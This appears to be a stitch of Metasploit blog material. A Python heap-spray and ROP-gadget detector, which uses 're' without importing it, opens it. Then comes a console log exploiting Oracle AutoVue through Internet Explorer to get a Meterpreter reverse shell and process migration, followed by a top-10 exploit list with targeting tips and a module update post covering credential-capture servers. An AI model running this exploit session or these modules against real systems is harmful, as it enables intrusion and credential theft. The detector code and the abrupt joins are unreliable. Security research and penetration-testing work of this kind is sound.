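import struct
from collections import Counter

# Constants taken from the layout and gadget tables above: the spray address
# the post uses and the three msvcr71.dll (Java 6) pivot gadgets it names.
SPRAY_DWORD = 0x0C0C0C0C
KNOWN_GADGETS = {
    0x7C341AE4: "ADD ESP,48 ; RETN (first stack pivot)",
    0x7C3522CA: "ADD EAX,20 ; RETN (second-stage pivot)",
    0x7C348B05: "XCHG EAX,ESP ; RETN (second-stage pivot)",
}
# A run of JavaScript unescape()-style %uXXXX units, and one unit within it.
_RUN = re.compile(r"(?:%u[0-9a-fA-F]{4})+")
_UNIT = re.compile(r"%u([0-9a-fA-F]{4})")


def decode_unescape(run):
    """Turn a %uXXXX run into the little-endian bytes unescape() would
    place in memory (each unit is one 16-bit code unit)."""
    return b"".join(struct.pack("<H", int(h, 16)) for h in _UNIT.findall(run))


def dword_histogram(data):
    """Count every 32-bit little-endian value at 2-byte steps, since %u units
    are 16-bit and a dword may straddle two of them."""
    counts = Counter()
    for off in range(0, len(data) - 3, 2):
        counts[struct.unpack_from("<I", data, off)[0]] += 1
    return counts


def scan_js(source, min_spray_dwords=64):
    """Scan page/JS source for the indicators described in the post: a large
    count of 0x0c0c0c0c spray dwords, or any of the known pivot addresses."""
    total = Counter()
    for run in _RUN.findall(source):
        total.update(dword_histogram(decode_unescape(run)))
    gadgets = sorted(KNOWN_GADGETS[a] for a in KNOWN_GADGETS if total[a])
    return {
        "spray_dwords": total[SPRAY_DWORD],
        "gadgets": gadgets,
        "suspicious": total[SPRAY_DWORD] >= min_spray_dwords or bool(gadgets),
    }


if __name__ == "__main__":
    # Constructed sample, not captured from any real page.
    sample = ("var nop = unescape('" + "%u0c0c" * 200 + "');\n"
              "var rop = unescape('%u1ae4%u7c34');")
    print(scan_js(sample))
```

The threshold is a heuristic; lower it for short proof-of-concept pages, and expect benign Unicode-heavy scripts to produce a handful of matches rather than hundreds.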

And then of course, we finish off the vulnerability with a shell:

msf > use exploit/windows/browser/oracle_autovue_setmarkupmode
msf  exploit(oracle_autovue_setmarkupmode) > show options

Module options (exploit/windows/browser/oracle_autovue_setmarkupmode):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   OBFUSCATE   false            no        Enable JavaScript obfuscation
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(oracle_autovue_setmarkupmode) > set OBFUSCATE true
OBFUSCATE => true
msf  exploit(oracle_autovue_setmarkupmode) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.128:4444 
[*] Using URL: http://0.0.0.0:8080/BqDGljqonJalxvs
[*]  Local IP: http://192.168.1.128:8080/BqDGljqonJalxvs
[*] Server started.
msf  exploit(oracle_autovue_setmarkupmode) > [*] 192.168.1.151    oracle_autovue_setmarkupmode - User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
[*] 192.168.1.151    oracle_autovue_setmarkupmode - Sending html
[*] Sending stage (752128 bytes) to 192.168.1.151
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.151:49165) at 2012-08-06 08:41:58 +0200
[*] Session ID 1 (192.168.1.128:4444 -> 192.168.1.151:49165) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3156)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3816
[+] Successfully migrated to process 

msf  exploit(oracle_autovue_setmarkupmode) > sessions

Active sessions
===============

  Id  Type                   Information                                     Connection
  --  ----                   -----------                                     ----------
  1   meterpreter x86/win32  WIN-RNJ7NBRK9L7\Juan Vazquez @ WIN-RNJ7NBRK9L7  192.168.1.128:4444 -> 192.168.1.151:49165 (192.168.1.151)

msf  exploit(oracle_autovue_setmarkupmode) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions.

Exploit Database (DB)

Each month we use the exploit database (DB) to compile a list of the top 10 most searched exploit and auxiliary modules from Metasploit. The database analyzes searches conducted on Metasploit.com from the webserver's logs. (We do not track actual Metasploit usage, to preserve users' privacy.)

This month's list has the top 5 hanging strong from last month, with three new additions coming in at numbers 8, 9, and 10. Tod Beardsley broke down the top 10 to give some valuable insight into the exploits.

  1. Microsoft Server Service Relative Path Stack Corruption (CVE-2008-4250, MSB-MS08-067): A four year old vulnerability that tends to give the most reliable shells on Windows 2003 Server and Windows XP. It’s also got a great pile of language pack targets. All of Metasploit’s exploits provide US English targeted shellcode, a few might provide Chinese, Spanish, French, or other popular languages; this one has targets in pretty much every language you’ve ever heard of. This exploit is also not ancient, so it’s reasonable to expect to find some unpatched systems in a medium to large enterprise vulnerable to it. More on this topic at Microsoft’s Security TechCenter. Same position as last month.

  2. MS12-020 Microsoft Remote Desktop Use-After-Free DoS (CVE-2012-0002, MSB-MS12-020): This is the 2012 RDP Bug, where it was implied -- but never proven in public -- that a pre-auth bug in RDP can allow for remote code execution. This is likely the most popular module we have due to both recency bias and because there was an unusual level of spontaneous organization of the Metasploit developer community to search for the correct path to remote code execution. So far, nobody’s gotten RCE yet (in public), but the Metasploit module provides the most clues. More on this topic in an article on ZD Net. Same position as last month.

  3. Microsoft Server Service NetpwPathCanonicalize Overflow (CVE-2006-3439, MSB-MS06-040): A six year old vulnerability that’s notable in that there’s no official patch from Microsoft for this on Windows NT 4.0. This was discovered after NT went end-of-life, so if you need remote root on an NT machine (and there are still plenty out there), this is going to be your first choice. More on this topic at Microsoft’s Security TechCenter. Same position as last month.

  4. Microsoft RPC DCOM Interface Overflow (CVE-2003-0352, MSB-MS03-026): A nine year old vulnerability that used to be the de facto standard exploit for Windows machines - this is the RPC DCOM bug, and it affects ancient NT machines. It was most notable in that it was used by the Blaster and Nachi worms to transit networks. It’s now pretty much a case study in stack buffer overflows in Windows, so it’s got a lot of historical value. If memory serves, this was the most reliable exploit in Metasploit v2. More info on that at Windows IT Pro. Same position as last month.

  5. MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption (CVE-2012-1875): This module was mentioned in the IE Zero-Day Exploits blog post along with the XML Core Services bug, CVE-2012-1889. Also like the XML Core services bug, this bug was being actively exploited in the wild in June of 2012. Unlike the XML Core Services bug, though, this one had a patch. I suspect there was some confusion about which bug was patched and which wasn't, given the modules were released close together and both were mentioned in the same post. Regardless, given the recency of these modules, it's not surprising to see them leap into the top ten for June. Same position as last month.

  6. Adobe PDF Embedded EXE Social Engineering (CVE-2010-1240): This module exploits CVE-2010-1240 in Adobe Reader. The idea is that you can embed and execute a Meterpreter PE Executable in a PDF, and when the user opens the PDF, surprise shells! Since it’s on this list, it’s probably the most popular social engineering-style module. More on this topic at the National Vulnerability Database. Up 4 places from #10 this month.

  7. Microsoft Windows Authenticated User Code Execution (CVE-1999-0504): The PSExec module is a utility module -- given an SMB username and password with sufficient privileges on the target machine, the user can get a shell. It’s not sexy, but it’s super handy for testing payloads and setup. Even though it’s a lowly #10, I’d bet it’s the most-used module in classroom and test environments. More on this topic at the National Vulnerability Database. Up 1 place from #8 since last month.

  8. Java Signed Applet Social Engineering Code Execution: This module has been a long-time coming to the Top 10 list. Like the Adobe PDF Embedded EXE Social Engineering module, this is a really solid go-to module for social engineering payloads. A simple Google search turns up dozens of demonstration videos from all around the world on how to use this module. New entry this month.

  9. PHP CGI Argument Injection: This module is a returning contender from the May 2012 Top 10 list. This exploits CVE-2012-1823, a vulnerability in the way PHP-CGI handles parameters passed on GET requests. The vulnerability was discovered during a capture-the-flag exercise at NullCon in January 2012, and the bug's life cycle is pretty thoroughly documented over at De Eindbazen. Here's the short story: this bug, which allows for command execution via GET requests to PHP-CGI installations, has been knocking around PHP installations since 2004. It was first reported to PHP in January of 2012 (yes, eight years after it was introduced), subsequently leaked accidentally in May of 2012, and actively exploited shortly thereafter. More info on this on a blog at Serge Security. Returning entry from May 2012.

  10. Joomla 1.5.12 TinyBrowser File Upload Code Execution: A bit of a surprise entry, this bug is two and a half years old and not on common software. However, there are how-to videos which appear in search results for "Joomla Metasploit." Links related to videos often have higher click-through rates. New entry this month.

Do you have any insight into July's Top 10 Exploits? Please let us know in the comments below.


If you want to use any of these exploits right now, you can download Metasploit for free.

The Vegas and vacation season is behind us, so it's time to release our first post-4.4.0 update. Here we go!

Exploit Tsunami

A few factors conspired to make this update more module-heavy than usual. We released Metasploit 4.4 in mid-July. Historically, a dot version release of Metasploit means that we spend a little post-release time closing out bugs, performing some internal housekeeping that we'd been putting off, and other boring software engineering tasks. Right after this exercise, it was Vegas season for the security crowd, and a pretty huge chunk of Metasploit was out there for BlackHat, DefCon, and BSides. Related to DefCon season, we had an unusually high volume of module submissions in the last two weeks.

So, we end up with a union of module backlog and a bumper crop of exploits and auxiliary modules. This update brings new exploits for, in no particular order, Symantec Web Gateway, Zenoss, the Linux Kernel, CuteFlow, WebPageTest, Nmap, EGallery, Cisco Linksys WVC200, Microsoft Internet Explorer, Photodex ProShow Producer, Dell SonicWALL Scrutinizer, Simple Web Server, Windows Task Scheduler, Microsoft Office SharePoint Server, and Novell ZENworks.

Authentication Capture

Community contributor Patrik Karlsson (aka, @nevdull77) has been on fire lately with his Authentication Capture modules -- this update has modules for impersonating MySQL and SIP servers to go along with his DB2, Microsoft SQL, and VNC server auth capture modules.

The basic idea with these is that you, as a penetration tester, trick your victim into providing authentication credentials to your fake server (which is really a Metasploit instance). This can be done in a variety of ways. If you're local to the victim, you can pretty trivially poison DNS or DHCP to get your victim to the wrong place. If you're remote, it might be just a matter of social engineering, or domain squatting, or something along those lines.

Of course, this isn't the only use of these modules. Having a responsive authentication service at your fingertips is a super-handy research tool if you're interested in experimenting with how different clients behave, or if you're looking to train up a protocol analyzer or something like that. They're really pretty versatile, so thanks tons, nevdull, for your work on these!

Lone Star Ruby Conf

Almost totally unrelated to Metasploit updates, I'm seizing this blog post to point at my upcoming talk at Lone Star Ruby Conf 6 here in Austin at the end of the week. It's entitled "Offensive Ruby," and I'll be speaking on Friday morning. The abstract is linked from the LSRC page -- the shorter of the short stories is, I'll be talking about how the security community has adopted Ruby for its own, and give demos. I intend to deliver a whirlwind tour of PacketFu, Ronin, Ruby BlackBag, Arachni, Metasm, and... well I guess I'll talk about Metasploit, too. (:

It's a developer conference, not a security conference, so my whole goal there is to remind the dev community that we exist, and not everyone who uses Ruby is using it to build out web apps and RSS readers. LSRC is notable in that it's not RailsConf, so that barrier shouldn't be too hard to breach -- there are lots of people there using Ruby for weird and wonderful applications. Should be fun, so if you happen to be there, track me down to say "hi."

New Modules

Here are the new modules -- for details and usage, follow the links to our Exploit Database.

Auxiliary modules

Exploit modules

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

For additional details on what's changed and what's current, please see the most excellent release notes.
